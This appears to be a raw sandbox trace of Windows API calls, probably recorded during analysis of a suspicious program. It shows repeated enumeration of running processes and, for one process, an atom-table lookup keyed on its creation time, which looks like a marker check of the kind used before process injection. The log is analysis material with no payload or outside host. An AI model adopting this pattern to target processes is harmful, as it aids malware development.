	[0078.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.370] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.370] CloseHandle (hObject=0x224) returned 1
	[0078.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.371] CloseHandle (hObject=0x224) returned 1
	[0078.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.371] CloseHandle (hObject=0x224) returned 1
	[0078.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.371] CloseHandle (hObject=0x224) returned 1
	[0078.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.371] CloseHandle (hObject=0x224) returned 1
	[0078.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.371] CloseHandle (hObject=0x224) returned 1
	[0078.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.371] CloseHandle (hObject=0x224) returned 1
	[0078.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.371] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.371] CloseHandle (hObject=0x224) returned 1
	[0078.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0078.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.372] CloseHandle (hObject=0x224) returned 1
	[0078.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.372] CloseHandle (hObject=0x224) returned 1
	[0078.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.372] CloseHandle (hObject=0x224) returned 1
	[0078.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.372] CloseHandle (hObject=0x224) returned 1
	[0078.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.372] CloseHandle (hObject=0x224) returned 1
	[0078.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.372] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.372] CloseHandle (hObject=0x224) returned 1
	[0078.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.373] CloseHandle (hObject=0x224) returned 1
	[0078.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.373] CloseHandle (hObject=0x224) returned 1
	[0078.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.373] CloseHandle (hObject=0x224) returned 1
	[0078.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.373] CloseHandle (hObject=0x224) returned 1
	[0078.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.373] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.373] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.374] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.374] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.374] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.374] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.374] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.374] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.374] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.374] CloseHandle (hObject=0x224) returned 1
	[0078.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.375] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.375] CloseHandle (hObject=0x224) returned 1
	[0078.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.375] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.375] CloseHandle (hObject=0x224) returned 1
	[0078.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.445] CloseHandle (hObject=0x224) returned 1
	[0078.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.445] CloseHandle (hObject=0x224) returned 1
	[0078.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.445] CloseHandle (hObject=0x224) returned 1
	[0078.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.445] CloseHandle (hObject=0x224) returned 1
	[0078.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.446] CloseHandle (hObject=0x224) returned 1
	[0078.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0078.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.446] CloseHandle (hObject=0x224) returned 1
	[0078.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.446] CloseHandle (hObject=0x224) returned 1
	[0078.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.446] CloseHandle (hObject=0x224) returned 1
	[0078.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.446] CloseHandle (hObject=0x224) returned 1
	[0078.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.446] CloseHandle (hObject=0x224) returned 1
	[0078.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.446] CloseHandle (hObject=0x224) returned 1
	[0078.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.447] CloseHandle (hObject=0x224) returned 1
	[0078.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.447] CloseHandle (hObject=0x224) returned 1
	[0078.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.447] CloseHandle (hObject=0x224) returned 1
	[0078.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.447] CloseHandle (hObject=0x224) returned 1
	[0078.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.447] CloseHandle (hObject=0x224) returned 1
	[0078.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.448] CloseHandle (hObject=0x224) returned 1
	[0078.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.448] CloseHandle (hObject=0x224) returned 1
	[0078.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.448] CloseHandle (hObject=0x224) returned 1
	[0078.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.448] CloseHandle (hObject=0x224) returned 1
	[0078.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.448] CloseHandle (hObject=0x224) returned 1
	[0078.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0078.449] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.449] CloseHandle (hObject=0x224) returned 1
	[0078.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0078.449] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.449] CloseHandle (hObject=0x224) returned 1
	[0078.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0078.449] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.449] CloseHandle (hObject=0x224) returned 1
	[0078.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0078.449] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.450] CloseHandle (hObject=0x224) returned 1
	[0078.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0078.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.450] CloseHandle (hObject=0x224) returned 1
	[0078.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0078.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.450] CloseHandle (hObject=0x224) returned 1
	[0078.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0078.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.450] CloseHandle (hObject=0x224) returned 1
	[0078.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0078.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.450] CloseHandle (hObject=0x224) returned 1
	[0078.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0078.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.450] CloseHandle (hObject=0x224) returned 1
	[0078.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.450] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.450] CloseHandle (hObject=0x224) returned 1
	[0078.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0078.451] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.451] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0078.451] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0078.451] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0078.451] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.451] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0078.451] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0078.451] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0078.452] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0078.452] CloseHandle (hObject=0x224) returned 1
	[0078.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0078.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0078.452] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.452] CloseHandle (hObject=0x224) returned 1
	[0078.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0078.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0078.452] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.452] CloseHandle (hObject=0x224) returned 1
	[0078.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0078.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0078.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0078.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0078.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0078.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0078.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0078.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0078.529] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.529] CloseHandle (hObject=0x224) returned 1
	[0078.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0078.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0078.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0078.529] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.529] CloseHandle (hObject=0x224) returned 1
	[0078.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0078.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0078.529] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.529] CloseHandle (hObject=0x224) returned 1
	[0078.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0078.529] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.530] CloseHandle (hObject=0x224) returned 1
	[0078.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0078.530] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.530] CloseHandle (hObject=0x224) returned 1
	[0078.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0078.530] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.530] CloseHandle (hObject=0x224) returned 1
	[0078.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0078.530] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.530] CloseHandle (hObject=0x224) returned 1
	[0078.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0078.530] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.530] CloseHandle (hObject=0x224) returned 1
	[0078.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0078.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0078.530] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.530] CloseHandle (hObject=0x224) returned 1
	[0078.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0078.530] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.530] CloseHandle (hObject=0x224) returned 1
	[0078.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0078.531] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.531] CloseHandle (hObject=0x224) returned 1
	[0078.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0078.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0078.531] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.531] CloseHandle (hObject=0x224) returned 1
	[0078.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0078.531] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.531] CloseHandle (hObject=0x224) returned 1
	[0078.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0078.531] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.531] CloseHandle (hObject=0x224) returned 1
	[0078.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0078.531] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.531] CloseHandle (hObject=0x224) returned 1
	[0078.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0078.531] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.532] CloseHandle (hObject=0x224) returned 1
	[0078.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0078.532] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.532] CloseHandle (hObject=0x224) returned 1
	[0078.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0078.532] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.532] CloseHandle (hObject=0x224) returned 1
	[0078.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0078.532] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.532] CloseHandle (hObject=0x224) returned 1
	[0078.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0078.532] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.532] CloseHandle (hObject=0x224) returned 1
	[0078.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0078.532] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0078.532] CloseHandle (hObject=0x224) returned 1
	[0078.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
